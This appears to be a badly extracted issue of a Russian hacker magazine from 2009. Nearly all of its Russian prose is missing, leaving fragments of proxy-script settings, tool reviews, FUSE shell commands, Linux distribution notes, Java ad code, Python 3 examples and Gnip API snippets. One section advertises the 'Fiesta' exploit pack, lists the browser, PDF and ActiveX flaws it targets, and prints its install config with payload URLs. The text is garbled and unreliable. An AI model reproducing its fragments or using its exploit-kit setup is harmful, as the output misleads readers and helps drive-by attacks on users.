Windows; U; AOL 5.0; TWRAITH )';//
User-Agent ... (false
)
$set['xforwadfor']=0;//XForwarded-For: 0- / , 1-
, 2-
$set['referer']=0;//Referer: 0-, 1-
$set['chngprx']=0;//0- , ,
, 1-

$set['addcapt']=0;//1-
,
, 0-
$set['allip']=true;//true- , false
$set['acssip']
$set['acssip']=array('127.0.');//
...
$set['logerror']='error.log';//
, false- ...
$set['logacess']='acess.log';//
, false- ...
$set['savacess']=1;//0-
, 1-

$set['tnlnbld']=false;//

$set['fltnl']='proxy.txt';//
X 02 /122/ 09

>>

$set['rntnl']=true;//
$set['ndtnl']=false;//

$set['nmtnl']='Data-Send';// ,

, , . , ,
socket,
.

: WIDECAP
: WINDOWS NT/2000/2003/XP/
VISTA
: MAX ARTEMEV

, IP.
2. ,
,
,
, WideCap.
, ? :).
3.

-.
.
, ,
:
-
, .
IE 7.
NTLM-.
TCP UDP.
SOCKSv4, SOCKSv5 HTTPS.
etc.
, ,
:).
P.S. $10,
, ,
.


, , :).
z, ,
,
,
FreeCap.

WideCap. , WideCap
,
.
WideCap ,

. , -
?
1. . WideCap

.

TCP/IP.
, . ,
.
2.
, FreeCap
.

WideCap.
3.
.

, :
1.
, /
X 02 /122/ 09

: FIESTA
: *NIX/WIN
: WEBZILLA


.
,
.

(aka )
:).
!
Fiesta.
,
2.4:
PDF;
PDF VIS;
Opera 9 9.21;
Yahoo Messenger;
Facebook PhotoUploader;
MSIE Speech;
MSIE CollectGarbage;
Mdac;
WebViewFolder;
IE COM objects;
SnapShot (, );
Fwb Dloader;
Microsoft Works Image Server ActiveX;
OurGame GlieDown2 ActiveX BO;

ARCserve Backup ActiveX;


America Online SuperBuddy ActiveX;
GomWeb;
XMLHTTP;
QuickTime;
Realtek;
ntaudio;
creative;
wme;
divx;
nsILocalFile.
, 2.4, , :
;
/;
PDF.
.
,
,
install.php.

:
<?php
$SQLHOST =
"localhost";
// , ,
$SQLLOGIN
=
"root"; //
$SQLPWD =
"password";
//

$SQLDB
=
"fiesta"; //
$TABLENAME
=
"tbl2"; //
$URL
=
"http://localhost/1/load.php"; //

$SWF
=
"http://localhost/1/1.swf"; //
SWF
$BACKURL =
"about:
blank";
?>

, , :).
, ,
,
.
, ,

. ,


. ,
(
-). ,

.
,
:). z

061

>>

>>

.

(malinaboy@yandex.ru)

Numb (numbxxx@gmail.com)

FirVain (firvain@gmail.com)

BRW9900 (smoke_wolf@mail.ru)

(m011611-92@mail.ru)

(grand-er@mail.ru)

062

X 02 /122/ 09

>>
MAGAZINE@REAL.XAKEP.RU
( )
!

- (funteam@rambler.ru)

(roomata@gmail.com)

(kotenka63rus@gmail.com)

(prutz1997@mail.ru)

(kapecz@gmail.com)

(sanek@xakep.ru)

X 02 /122/ 09

063


1 2009

2008
!

www.gameland-award.ru

Metal Gear Solid 4: Guns of the Patriots


Command & Conquer: Red Alert 3
Tomb Raider: Underworld
Super Smash Bros. Brawl
Guitar Hero: World Tour
Grand Theft Auto IV
LittleBigPlanet
Prince of Persia
Devil May Cry 4
Soul Calibur IV
Gears of War 2
Mirrors Edge
Fallout 3
Fable II

2009

>>
STEP
/ STEP@GLC.RU /

2:

-
ACM-ICPC

IBM Google?
? :
ACM-ICPC, IBM.
, , -, International Collegiate Programming
Contest (ICPC), IBM (ACM) ACM-ICPC.

, -.
100 . , . 2008
- . , .

ACM-ICPC
700 ,
, , , , , ,

066

, , . ,
,
. , ,
.
, . -
, (). ,
ACM-ICPC .
: 3 . 5 11 . , - .
. ,
X 02 /122/ 09

>>

. , online
. . ,
,
. ,
, . , .
,
:
, 11 . , ,
. ,
11 ! , , ,
. , , ,
. ACM-ICPC
. ACM-ICPC
.

, ,
, Java
( , ,
).
.
, ,
.
, .

:

, . n x m (1 <= n, m
<= 30) .
, , .
. , , , ,
, , . ,
, ,
X 02 /122/ 09

, . :
,
.


, .
ICPC , .
, . .
SOUTH ( ), WEST ( ), NORTH (
), EAST ( ), ,
DONE, .
, , ,
, (EMPTY)
(BLOCKED).


,
,
ACM-ICPC.
. , ,
. ,
: .
-, Pipe.
:
, . ,
, 2 !

. . , ,
,
.


,
? . ,
.
, -

067

>>

,

:

dvd

DVD-


, ,

links


.

-,


:
icpc.baylor.edu.
:
www.opencup.ru.
Code
Jam, Google:
google.com/codejam.

: neerc.ifmo.
ru/regional/.

068

.
,
. , ACM-ICPC, , ,
, , , .
. ,
. , :
.
, !
(
, ), , ACM-ICPC, ,
.
, , , . ,
, ,

. :
, , ..


,

. ICPC, , .
60 , ,
. ,
. , ,
. - , ,
!

,
,
. , ,
, . 10 (

1. .
..
2.
..
3. -
4. - ,

5. . .

6. . ..

7.
8.
9. . . .
10. -
11.
), .
, ,
. 22 .

ACM-ICPC . , , , ,
. ,
,
.
ACM-ICPC
, ,
, - .
, IBM ( , ),
, ,
IBM:

.
, ,
ACM-ICPC . ,
- (, ,
)? , ,
ACM-ICPC 2006, IBM
.
.
. ! z
X 02 /122/ 09

>> inside

/ STEP@GAMELAND. RU/

66

X 11 /107/ 07

>>
MIFRILL
/ MIFRILL@RIDDICK.RU /


MOZILLA

IT- , , , . , Mozilla Corporation Mozilla Foundation .


,
.
( ),
(Winifred Mitchell Baker).
. ,
, ,
, , Mozilla :).
open-sorce ,
, 1957 , , , . , , , .

070

,
. -. 1979 ,
, .
. 1987 ,
. , -
? . , .
1990 1993 Fenwick &
West LLP.
IT-, X 02 /122/ 09

>>

Ntscape 2.02,

. -
. ,
IT-. -
1993 , Sun
Microsystems, . Sun 10 , . ,
, ,
,

WWW. Sun ,
,
, Sun .


1994, Sun Microsystems ,
, ,
Netscape Communications Corporation. ,
Netscape Corp. .
, 94- ,
. , , Netscape Corp.
Silicon Graphics Inc.,
10 . 90- ,
, .
,
, .
- X 02 /122/ 09

, , , .
, , ,
. Mosaic,
.
1993,
Netscape. IBM- ,
Apple Macintosh, NCSA Mosaic. NCSA
National Center for Supercomputing Applications, .
, .
NCSA Mosaic , , . , . ,
, , Unix.
, .
Netscape, .
Netscape
.
, 1995
1999 , , .
, ,
, .
.
Netscape , .
, .
Mosaic Netscape 0.9 13
1994, . ,
NCSA, , , .
Netscape Navigator,
, .
Netscape Navigator ( ) , . ,


Netscape Navigator ,
, .
share-ware. .
, .
: 2 (1994-1996) 13 1300 .
1995 Netscape $85 .
, 1996 $346 .
... Microsoft
. ,
Netscape . Microsoft , ,
. , 1995 Netscape
. Netscape
, , -

071

>>
Spyglass Inc., , .
, Netscape, , . HTML 1996
. World Wide Web Consortium (W3C) HTML 3
, Netscape,
Netscape Navigator.
,
, ,
, Microsoft. , Windows 95. IE , Mosaic . CSS,
ActiveX Java 3.0. , Microsoft
HTML W3C.
, HTML IE.

MOZILLA

Netscape Internet Explorer 90%


, , . ,
. , 22
1998
Netscape Communicator. , Netscape,
, - , , ,
. ,
.
,
Netscape,
. ,
Netscape Public License, GNU, Netscape ,
. ,
( ) , . Mozilla Mosaic
killer Godzilla Netscape

23 1998 Netscape Mozilla


Organization Mozilla
Suite. Mozilla .
Windows. Netscape
,
? , Microsoft
.
. Microsoft , Internet
Explorer 1.0 1995 , ,
. Microsoft , , ,
Netscape , IE
. , IE Mosaic. Microsoft
Mosaic Spyglass Inc. , , NCSA, . NCSA -

072

. , 23 1998, Netscape Mozilla Organization


Mozilla Suite. , Netscape, . Mozilla
, ,
Beonex Communicator. Netscape , ,
, , 1998 Netscape IT- AOL,
. , ,
, Netscape
America Online.
1999,
Mozilla Organization. ? X 02 /122/ 09

>>

- Mozilla

2005 , Mozilla
Mozilla Corporation, Mozilla Firefox Mozilla Thunderbird.
.
Netscape,
.
, .
2005 , Mozilla
Mozilla Corporation, Mozilla Firefox Mozilla Thunderbird.
, , . Mozilla Corporation , . , , . , ,
, .
, , Mozilla Google, Firefox
, ,
open-source . Firefox
20% , .
, -

074

. Firefox , 2004 ,
, , Forbs The
Wall Street Journal. .
, . , . ,
, Mozilla
CEO , - . ,
Mozilla
, .
, , ,
.
, ,
! , , ,
.
,
- - :). z
X 02 /122/ 09

>>

2008

, .

... , . , , -

2003 Mozilla Foundation ,


.
, .
Chief Lizard Wrangler,
. open-source :).
- AOL 2000 Netscape 6,
Mozilla 0.6. , Mozilla .
Netscape , Mozilla ,
Opera, .
2001 AOL, ,
, . ,
. , , ,
. : ,
X 02 /122/ 09

. AOL
Mozilla Organization . 2003
Mozilla Foundation
,
.
, . AOL, ,
, Mozilla Foundation ,
$2 . . Mozilla .
Mozilla Foundation, , . Mozilla Firefox Mozilla Phoenix 0.1,
, . Mozilla , -

073

>> unixoid

J1M

PPS:



PPS

/ ZOBNIN@GMAIL.COM /

CPS:

Server
(1)
AdvPS

Elan
Server
(1)
AdvPS

Server
(1)
AdvPS

Server
(1)
AdvPS

Server
(1)
AdvPS

Server
(1)
AdvPS


, FUSE

Linux- fuse .
, tar- .
, .
.

UNIX,
, .
, .
, /proc.
, Plan9
: , , http- dns-.
, , .
, .
irc, ftp
, .

.

076


fuse , 9P Plan9, ,
, . , fuse
. ,
, .
, , fuse,
, ,
. fuse
.
fuse ,
, .
, fuse 2005
.
X 02 /122/ 09

>> unixoid

Linux
, fuse.
libfuse libfuse-devel,
. FreeBSD fuse
(sysutils/fusefs-*).
, sysctl:
# sysctl vfs.usermount=1
# echo 'vfs.usermount=1' >> /etc/sysctl.conf

FreeBSD , fusermount,

umount.
EncFS

,
Linux BSD.
, , .
, !
, .
,
. , ,
.
fuse / .
, .
fuse-zip (code.google.com/p/fuse-zip),
zip-. , ,
. :
$ mkdir /tmp/zip
$ fuse-zip /tmp/arch.zip /tmp/zip

$ vim ~/.compFUSEd
[/home/vasya/compressed]
#
backend = /home/vasya/.compressed
# (cf_zlib.so, cf_bzip2.so, cf_lzo.so
cf_lzo2.so)
compression = /usr/local/lib/compFUSEd/plugins/cf_lzo2.
so
writer = /usr/local/lib/compFUSEd/plugins/writer_
smarter.so
#
chunk_size = 65553
#
chunk_max = 100
#
exclude = gz tgz bz2 tbz2 zip rar jpeg avi mp3

:
$ compFUSEd ~/compressed

, , .
, fuse-zip .
, , , ,
,
, . ,
, ,
( , ,
). .
CompFUSEd (www.biggerbytes.be)
fuse. (gzip, bzip2,
lzo, lzo2) (8-64 ),
.
, .
:
$
$
$
$
#
#
#

cd /tmp
tar xzf cf-GISMO-200712321.tgz
cd ./CompFused/Gismo/
make
cp cf_main /usr/local/bin/compFUSEd
mkdir /usr/local/lib/compFUSEd/
cp -av plugins /usr/local/lib/compFUSEd

~/.compFUSEd :
X 02 /122/ 09

, ~/compressed,
~/.compressed.
compFUSEd , /usr/src,
/usr/local/etc compFUSEed.conf.
, CompFUSEd , .
.
, Reiser4
Linux ZFS FreeBSD.


,
, .
ssh.
sshfs (fuse.sourceforge.net/sshfs.html),
sftp, ssh-
. ,
fuse:
$ sshfs user@example.com _

, .
ftp: , fuse, curlftpfs (curlftpfs.sourceforge.net).

077

>> unixoid
, .
.
encfs, :
$ cd /tmp
$ mkdir crypted decrypted

encfs:
$ encfs /tmp/crypted /tmp/decrypted

fuse

libcurl, ssl-, http- .


, , ,
ftp- FreeBSD /usr/ports/distfiles
:
# curlftpfs ftp://ftp.freebsd.org/pub/FreeBSD/ports/
distfiles /usr/ports/distfiles

fuse http (httpfs.


sourceforge.net), .
smbnetfs (smbnetfs.sourceforge.net),
smbclient. Windows
Samba.
~/.smb smb.conf smbnetfs.conf.
/etc /usr/local/etc, Samba. smbnetfs,
.
smbnetfs:
$ mkdir -p ~/mnt/smb
$ smbnetfs ~/mnt/smb

, , , cd ~/mnt/smb. IP-:
$ cd ~/mnt/smb/ip-

:
$ cd ~/mnt/smb/:@

fuse
. encfs (www.arg0.
net/encfs). , encfs
,
. . ; ,
, ; (,
curlftpfs, , encfs,

). ,
, -

078

p. encfs,
ssl,
, .
, x
, .
/tmp/decrypted :
$ cd decrypted
$ echo secret > file

encfs :
$ fusermount -u /tmp/decrypted
$ cd /tmp/crypted
$ ls

,
. : goofs, offlinefs powfs.
goofs (code.google.com/p/goofs)
Google, :
1. , .
2. Picasa .
3. , .
4. Blogger , .
5. .
Goofs python, python-fuse
(fuse.sourceforge.net/wiki/index.php/FusePython) python-gdata
(code.google.com/p/gdata-python-client/). ,
FreeBSD
Linux.
goofs :
$ tar -xzf goofs-0.6.tar.gz
$ cd goofs/src/goofs
$ mkdir -p ~/mnt/google
$ python goofs.py ~/mnt/google --user zobnin@gmail.com
--pw password

, ~/mnt/google ,
.
. blogger.com.
:
$ cd ~/mnt/google/blogs

:
$ cd " , "

:
$ mkdir " , "
X 02 /122/ 09

>> unixoid
:
$ cd " , "
$ echo " goofs" > content

:
$ cd comments
$ echo " ? ?" > new

, ? , , , . /bin/sh, ,
cron .
!
UTF-8. Goofs, Google, UTF-8
. KOI8-R,
fuse
. offlinefs
(savannah.nongnu.org/projects/offlinefs)
CD/DVD- .

, ,
. .
fuse
,
. Offlinefs ,
ftp- ssh-. ,
. , afuse (afuse.sourceforge.net) ,
fuse, .
. ,
( ~/.offlinefs) :

(
), sshfs
$ offlinefs --rebuilddb
curlfstpfs. :
$ offlinefs ~/_
:
$ offimport_cd.sh -i /mnt/cdrom -l "-1"

, ~/_. , , powfs (powfs.sourceforge.


net) , . - , , powfs, ,
: - inotify,
.
# vim ~/.powfs
handler.dir.0=/tmp
handler.prg.0=/usr/local/bin/script1.sh
handler.dir.1=/etc
handler.prg.1=/usr/local/bin/script2.sh

$ mkdir -p ~/mnt/ssh
$ afuse -o mount_template="sshfs %r:/ %m -o
unmount_template=fusermount -u -z %m ~/mnt/ssh/

~/mnt/ssh sshfs.
afuse ,
. , cd ~/mnt/ssh/host.ru.
afuse ,
mount_template,
host.ru. ,
%r %m
, . , , . ,

, afuse - .z

info
fuse

avfs, ssh-,
ftp-, http-,

(rpm,
deb). , fuse

,
.

dvd



fuse,
.

:
$ powfs ~/_

smbnetfs

~/_/tmp ,
script1.sh, ~/_/etc script2.sh
(, ~/.powfs,
). - :
mail -s " " root@localhost $1

, fuse, X 02 /122/ 09

079

>> unixoid
BOBER
/ ZLOY.BOBR@GMAIL.COM /

!
LINUX:

, (Fedora, Debian, Ubuntu,


openSUSE) ,
Linux 1 . , .
MOPSLINUX
, Slackware ,
, . , . MOPSLinux
(www.mopslinux.org)
Slackware.
.
MOPSLinux 2.0 Server (2004 ),
. MOPSLinux . , , ,
. 6.0,
.
( data.xml). Slackware.
MOPSLinux
Slackware,
.
32-

080

1 DVD 3 CD .
LiveCD . ISO-o . ,
, . ,
. WiKi- ,
. ,
www.mopspackages.
ru, .
, ncurses, .
Linux. , , .
. cfdisk, fdisk
parted. : , , , , ,
. ,
.
, Slackware
, ,
, , ,
X 02 /122/ 09

>> unixoid

Runtu
PuppyRus

.
, KDE GNOME
. MOPSLinux
, ( Qt) MOPS Configurator (MOPSConfig). C
, , / , .
mpkg, APT.
, KDE ( MOPSLinux 6.2
3.5 4.1.3).
Nvidia ATI,
.

PUPPYRUS
2007 PuppyRus (www.
puppyrus.org)
Puppy Linux (www.puppylinux.org).
Puppy Linux 3.01.
( ) ,
, PuppyRus .
,
, .
( 100 ) , ,

, Puppy Linux Linux-.
DistroWatch.com 12 Slackware. , Puppy Linux , .
, PuppyRus .
: 10-
. 32 , Puppy
, .
256 .
PuppyRus LiveCD- ( , )
. ISO-.
M (Modern) ;
R (Retro). , PuppyRus
Siberia, Asus Eee.
:
X 02 /122/ 09

CD .
,
. Xorg Xvesa.
JWM. Xvesa,
.
,
.
JWM Windows (, ),
. . <Ctrl+Shift>.

*nix- .
:
?. , :
Abiword, SeaMonkey ( , , , IRC-, HTML- -),
, , .
, .sfs
SquashFS-. SquashFS readonly gzip.
Puppy ,

(puplets). .PET .PUP,
Slackware. gzip-,
.
, (Puppy 4
). PuppyRus,
Puppy Linux
.
Gslapt PetGet4
.
,
.
pup_safe.2fs,
CD/DVD (, ).
(pup_xxx.sfs).
. , ISO-, .

.

081

>> unixoid

, MOPSLinux Slackware!

RUSSIA + UBUNTU = RUNTU


Ubuntu Full Power, 2007 , : (
, )
, . , Ubuntu
, Flash, Java .
.

Ubuntu, Runtu. 1.1

DeepStyle
DeepStyle (deepstyle.org.ua)
Slackware 64- BlueWhite64
(bluewhite64.com), .
,
,
man-. -
. . DeepStyle ,
Slackware, . 2 DVD 8 CD-
(4 , 1 i18n 3 ) i386 x64
. ,
Slackware.

082

2007 . 3.0, Ubuntu 8.04


( LTS 2011 ).
Runtu ( source.list deb
http://archive.runtu.org/runtu/ hardy main universe),
Ubuntu Runtu.
Runtu Gnome.
Ru.Xubuntu 7.04 (xubuntu.runtu.org) XFce.
Runtu
Office.
ISO- 1,83 ,
Ru.Xubuntu 648 . 32-
.
-. ( ,
) ,
.
CPU 1 , 256 RAM. 384
RAM 5 .
,
. , .
Gnome 2.22 - Windows, . Runtu - KDE
4. .
. . Ubuntu.
, X 02 /122/ 09

>> unixoid

ASPLinux Fedora

, OpenOffice.Org 2.4.1 Pro , Firefox 3.03 , Thunderbird 2.0.17, Gimp


2.4.6. Wine 1.1.5. 2.6.24-21, X.Org 7.3.
3.0
Nvidia ATI. Totem Audacious
.

Russian Fedora
Fedora 10
Russian Fedora (www.russianfedora.ru).
Fedora,
.
Nvidia.
DVD- 32- 64- , Delta- ( ), Fedora 10
Russian Fedora. , GNOME KDE,
XFCE LXDE, IceWM.
.
, Russian Fedora
Fedora, ASPLinux.
, ASPLinux , , Russian
Fedora.
X 02 /122/ 09

, , . ,
,
. , .
.

ASPLINUX
ASPLinux (www.asplinux.ru)
RedHat ( Fedora) . -
Fedora, ,
. , ASPLinux 14.0 Cobalt ( 13 ), , Fedora 9,
Fedora 10.
, , . LiveCD
Greenhorn. , , Standard Express. LiveMedia Edition 1
DVD ,
, . Deluxe: , DVD, . .
DVD-, i386.
: Pentium III, 512 RAM 5
.

083

>> unixoid

DeepStyle

ALTLINUX
ALTLinux Alterator

( , , ), 12 ASPL :
ASPLoader, ASPInstaller,
ASPDiskManager (
).
Fedora.
, , , , Java
.
, .
man- . UTF-8;
.
Anaconda, , RedHat/Fedora, ASPL .
,
. , - , LVM,
.
,
/ .
/ ,
, (*sigh*).
ReiserFS
( ). .
: ,
-. GNOME
2.22.3, 2.6.26.

, DVD - .
Compiz, OpenOffice.org 3.0, Firefox 3.0 (
), Thunderbird 2.0 . YUM.
Yum Extender,
/ . ASPL, ,
,
Fedora 9.
: ASPL, gcc, glibc, binutils
, - . ,
, .
,
ASPLinux (asplinux.net).

084

ALTLinux (www.altlinux.ru) Mandrake ( Mandriva) Mandrake Russian Edition. IPLabs


Linux. , .
,
, , .
, ALT ,
Mandrake. , ,
.
ALTLinux Sysiphus
(www.sisyphus.ru),
. Mandrake, ALTLinux
RPM, . APT.
3.0, (, ,
, )
Alterator .
ALTLinux! ,
.
4.1. , , : Desktop Personal Lite.
,
XFce. : Children. FTP/HTTP ISO- (
32- i586 64- ) CD
DVD, LiveCD, .
, LiveCD . USB-
Alterator.
.
Desktop CPU 1 , 256 RAM 6 .
: 2.6.25, KDE
3.5.10, OpenOffice.org 2.4.
, Nvidia/ATI. DRI
DRI Conf.
(tcb,
chroot). Desktop Professional, Server Edition 5- . ,
,
, . -
.
!
, .
, .
, (forum.altlinux.
org), . z
X 02 /122/ 09

>> coding

/ ZANITO@GMAIL.COM /

, Hello World Java -


- .
, , ,
.

, -.
, !

,
, , Spedia.net
, , 100% , ,
. ,
.
GetJar.com, .
Google,
, -

086

. GetJar Ads ( MADI, Mobile AD


Injection)
. , ,
, - - . ,
(
2009 . .), .
, . , !, z.



GetJar Ads? 2 50
X 02 /122/ 09

>> coding

dvd


java-
BlueFTP JAD.


.

links

Java-
($2 to $50 CPM ).
. .


.
Bluetooth Hack Adult Video Downloader
10-20 .
2000 .
$8. ,
, 10000 , , ,
4 , , $800 . !
,
800 ,
- ? ,
- , , ,
, ,
, .
- / - , , .

, ,

,
,
. , ?
X 02 /122/ 09

WWW.GETJAR.COM


.
WWW.MEDIEVAL.IT

.

SMS ( ,
, ..), - Bluetooth (
).
Google
Maps Gmail
. ? , .
, .
, .


API
Java-. , ,
, , , .
,

.
,
. ,
, . , , .
GetJar
. , , , ,
. ,
, GetJar Ads. ,
. ,
. ,
, .
, . , Erotic Casino,

087

>> coding

. ? .
Free Erotic Poker ? .
-. !

. GetJar API ,
, .
, , - . ( ) , .
Medieval Software Bluetooth File Transfer OBEX FTP
, , BlueFTP. Bluetooth-. -
-
GetJar
.
. , , API -

088

Java.
. ,
GetJar.
. -, , ,

. BlueFTP ,
:

Strings;
HttpConnectionhttpconnection;
OutputStreamoutputstream;
InputStreaminputstream;
s = "publisherID=" + Integer.toString(b) + "&channelID="
+ Integer.toString(c) + "&userID=" + (d==-1L?"":Long.
toString(d)) + "&version=" + "1.1_xml" + "&userAgent=" + c()
+ "&impressions=" + (a==-1L?"":Long.toString(a) + "-1");
httpconnection=null;
outputstream=null;
inputstream=null;
httpconnection=(HttpConnection)Connector.open(
X 02 /122/ 09

>> coding

"http://ad.getjar.com/export/");
httpconnection.setRequestMethod("POST");
httpconnection.setRequestProperty(
"Content-Type","application/x-www-form-urlencoded");
httpconnection.setRequestProperty(
"Content-Length",Integer.toString(s.length()));
outputstream=httpconnection.openOutputStream();
outputstream.write(s.getBytes());
inputstream=httpconnection.openInputStream();
idid1=newid();
id1.a(inputstream,null);
a(id1);
if(f.size()>0)
{
if(kb1!=null)
{
ibib1=(ib)f.elementAt(g.nextInt()%f.size());
a=ib1.a();
kb1.a(e,ib1);
}
}else
{
thrownewException("NoADfound...");
}

, case, if
Java ? b c , a d =
-1, , f Vector, g .
, ,
. , .
, GetJar BlueFTP 716000 , 65211 .
.
.
Medieval ,
. ,
.

? .
(http://my.getjar.com/site/Developers)
GetJar.com. , , .
advertise@getjar.com GetJar Ads.

. . , , ,
X 02 /122/ 09

BlueFTP ,


-
Medieval , ,
(we had wide holidays
this year in Italy), - , . , .
. GetJar
, .
: , ,
( 100 , , 1-3 ).
,
2 50 . .
, , ,
. ,
,
.
. ,
-, .
, . ,

. .

, GetJar Ads . , .
, GetJar
, , .
, Java ! .
, . z,
, .


,
, GetJar
. GetJar
, .
? ,
:). z

089

>> coding

/ ALEKSEI.CHERKES@GMAIL.COM /

PYTHON 3000:
PYTHON 3000:

.
.
. Python
.
Python , .
,
. 2008 Python 3.0, Python 2.6. .
,
.
, ,
. ,

090

. ,
.
!
, 3.0 Python . Python 2.6?
. , , ,
( ).
, ,
.
X 02 /122/ 09

>> coding

links

ANNOTATIONS
, .
doc-strings , , .
,

doc-string .
.
. Python 3k .
. :
def foo( x:"first papam", y:int ) -> max(1,2):
pass
print( foo.__annotations__ )

foo . ,
__annotations__. ,
, ,
. ->
.
return ( return). print( __annotations__ ),
: {'y': <class 'int'>, 'x':
'first papam', 'return': 2}. :
.
, ,
, . ,
.
X 02 /122/ 09

, , .
, , : (
IDE), (
typecheck ), .

PRINT !
print. : ! .
:
print([object, ...][, sep=' '][, end='\n'][,
file=sys.stdout]).


,
. sep,
end. str end None,
. :

docs.python.org/3.0/
whatsnew/3.0.html
Whats New In
Python 3.0.
!
www.artima.
com/weblogs/viewpost.
jsp?thread=211200
www.artima.
com/weblogs/viewpost.
jsp?thread=211430
Python 3000 FAQ.


Py3k.
www.python.
org/dev/peps
Python Enhancement
Proposals (PEPs).

info
Old: print "The value of X is:", 2
New: print("The value of X is:", 2)
Old: print x,
New: print(x, end=" ")
Old: print
New: print()

#
#

#
# !

Old: print >>sys.stderr, "error message"


New: print("error message", file=sys.stderr)

__future__

.
,
,

091

>> coding
try:
...
except ValueError, TypeError: # !
...

,
: ValueError TypeError.
. ValueError TypeError.
, .
, ( as
, ).
. . ( except finaly),
( ),
__context__ . . :
raise SecondaryException() from primary_exception

SecondaryException, __cause__, primary_


exception. .
,
, , .
__traceback__,
sys.exc_info().

, Pyhon 3000

Old: print (x, y)


New: print((x, y))

#
# A !

,
. : ,
, , , -.
,
. ! , .

EXCEPTIONS
. ,
TypeError exc,
:
try:
# ...
except TypeError as exc:
# ...

as . , , , , .
:

092

WITH STATEMENT
with. ,
, . , ,
. ,
finally. ,
. ,
with, . :
with open(filename) as f:
## f

! ? with
. , (context manager). __enter__
() __exit__(). __enter__()
, with. ,
as (
). __exit()__ ,
( ),
. with, , -, (
__exit__), -,
.

, ( ) .
. ,
.
__enter__() __exit__().

UNICODE
2.0 str. X 02 /122/ 09

>> coding

. . str
, . ,
. 2.x, , unicode. ,
, . -
str
. - , (
UnicodeDecodeError).
Python 3k . str
(, unicode),
bytes (
str). . str.encode() bytes.
decode(), . u"...".
. bytes
b"...". utf-8.
open(...). . bytes
/,
- .
,
ASCII-.
, . .. ! , , , . ,
:).

PORTING
Python 3.0? .
, X 02 /122/ 09

, ,
. - : ,
?. ,
- 2.x , ,
.
Python 3.x.
, , , .
. , , . 2to3.
CPython.
, 2.x, 3.x. ,
.
:
1) . .
2) 2.6. 2.x 2.(x+1) .
3) . import
from __future__. -3 , .
4) 2to3, , 3.0 . , . Python -.

FAREWELL
. ,
, , ! , , . ,
, , . !z

093

>> coding

dvd

,
,

.

links


(http://gnipcentral.com)
:
Digg, Twitter del.icio.us, Producers
(), Consumers (). Gnip
, : , . :
, , 10 ..., Gnip
URL,
(activities) xml;
,
(postUrl),
POST- XML
.
postUrl, :
, ;
fullData, , id ///- ;
(rules), .
.
(Actor), (Tag), , .

, (
).

: ,
,
.
,
, , : Twitter,
del.icio.us, youtube, digg .

, , RSS-
,
.
X 02 /122/ 09

API ,
, ,
API, , . ,

: ,
.

,
API.
. youtube del.icio.
us - ,
( -). ,
.
: , , MyYFilter
MyDFilter. fullData ,
Actor ( ,
). , , -.
postUrl (,
http://example.tld/xak/watch/ping.php),
- ping.php,
. , :
Gnip , .


, ,
. , ,
POST- . , , var1=val1&var2=val2,
xml. stdin:

- ,
,
,
http://gnipcentral.com.

warning
,

, ,

,
.

:).

info

FriendFeed,
,

, .

$stdin = fopen("php://stdin", "r");


$pst = fread($stdin,
getenv("CONTENT_LENGTH"));
mail("your@ma.il",
" , !", $pst);

095

>> coding

/ FROMXA@VA1EN0K.NET /

. ( 140 ,
twitter.com), , ,
, ... !
, ?
. , :
Gnip.
, , , - .
: ,
, -: .
: -
. : ,
.
, :
,

094

. . -,
,
. -,
, , ,
( , - ) . , , , ,
. ,
, Gnip.

DEUS EX MACHINE
? : we got $h*t to pop
making data portability suck less, , -, ,
. , X 02 /122/ 09

>> coding
activity: tags, url, regarding, actor at, . , url- url
, url regarding.
regarding : , ,
http://xakep.ru/, .
,
. $parsedxml
SimpleXMLElement : , XML, stdin. , <activities>, ; - , attributes(),
. , $parsedxml->
activity->attributes()->regarding URL. , del.
icio.us ( youtube), , , :

:
( UTF8, ,
);
- del.icio.us ( ,
, );
, .
:

$parsedxml = new SimpleXMLElement($pst);


if ($parsedxml->attributes()->publisher == "delicious")
{
mail("your@ma.il", " del.icio.us ".
$parsedxml->activity->attributes()->actor,
"
".$parsedxml->activity->
attributes()->actor." del.icio.us
".$parsedxml->activity->attributes()->
regarding.", ".$parsedxml->activity->
payload->body." ".$parsedxml->
activity->attributes()->tags."."
);
}


- . , :


<?xml version="1.0" encoding="UTF-8"
standalone="yes"?><activities publisher="delicious">
<activity
tags=","


va1en0k del.icio.us
http://gnipcentral.com/, Gnip: We got
$h*t to pop gnip,tool.

source="http://feeds.delicious.com/v2/rss/va1en0k"
regarding="http://twitter.com/"
url="http://delicious.com/url/
1cc089548931c4fe0463e7a98ec6078e#va1en0k"
action="bookmark"
actor="va1en0k"
at="2009-01-11T12:13:23.000Z"><payload>

. . , ,
youtube, ,
(, regarding ).
- .

<body> -</body>
<raw>
H4sIAGbiaUkAA52S3UrDMBiGz3cVoYIn6tKfubWz65FH4oHoFWTptxn6k5Kk
imdjN+A9eAUiCDph15DekWnXbroDwQUCIfnyPC9fEvJCRT2EwqKcXhIF0V2Z
nyLHQVckR65tB8hxx443dj10YpsR4q6wvkTNYs7FE4p5Rlg+se6VKsYYx5Ay
yngp+5Rn+IE4kNsJtiL9VT13M8Td7YNQ1bJa6NcdcB/HswxydStl1IJmALHs
7+FcLKTEpUixQ6ntB+cDP/AcOpiBPRh6MCKBD3Roj3ww/B2yMQggiouojWTO
240f+q38t/Zfvo1tXrIYMXkDIiPXLE8m1oykEqzDBUfb4DW7kSimUoj0i37T
H6a/S/1eLZBemTav9Fp/npmddYg3VXV9aoJ0AdQjUwpEow9xc1KXSF4KCsgE
2r7oHw/RRrK6ph6TgssLiaacJxkRiQzxBhj1Qtz83G8pwUzRwAIAAA==
</raw>
</payload>
</activity></activities>

: XML, PHP ! SimpleXMLElement,


, .
( body) , , ,

096


,
. , . ,
, . ,
,
Actor-.
, [view my filters], edit, .
,
,
! Gnip API .
.
. (-
Google Docs) http://gnipcentral.com Data Consumers
X 02 /122/ 09

>> coding

click here. GET- POST- HTTPS https://


prod.gnipcentral.com, POST- XML. . ,
?
Gnip .NET, Java, Python, Perl,
PHP Ruby. http://github.com/gnip (
) ( , ). -
PHP Services: Gnip Gnip.
php - ,
add.php, .
Services_Gnip.
, e-mail ,
. : Services_Gnip_Filter
getFilter($publisher, $name) , , delicious,
: MyDFilter. , ,
: , rules ;
updateFilter($publisher, $filter). :
$f = $gnip->getFilter("delicious", "MyDFilter");
$f->rules[0]->value .= ", ivanov";
echo $gnip->updateFilter("delicious", $f);

updateFilter ;
Success. .
,
Actor [view my filters] edit. ? !
add.php
Gnip PHP. , , ,
. 24 HTML. , . ,
. ,
.
explode, , implode. , ,
( ).
: ,
url-, ;
. , Services_Gnip_Filter:
X 02 /122/ 09

$newfilter = new Services_Gnip_Filter($name, $fulldata,


$postUrl, $rules);

, . (, ) .
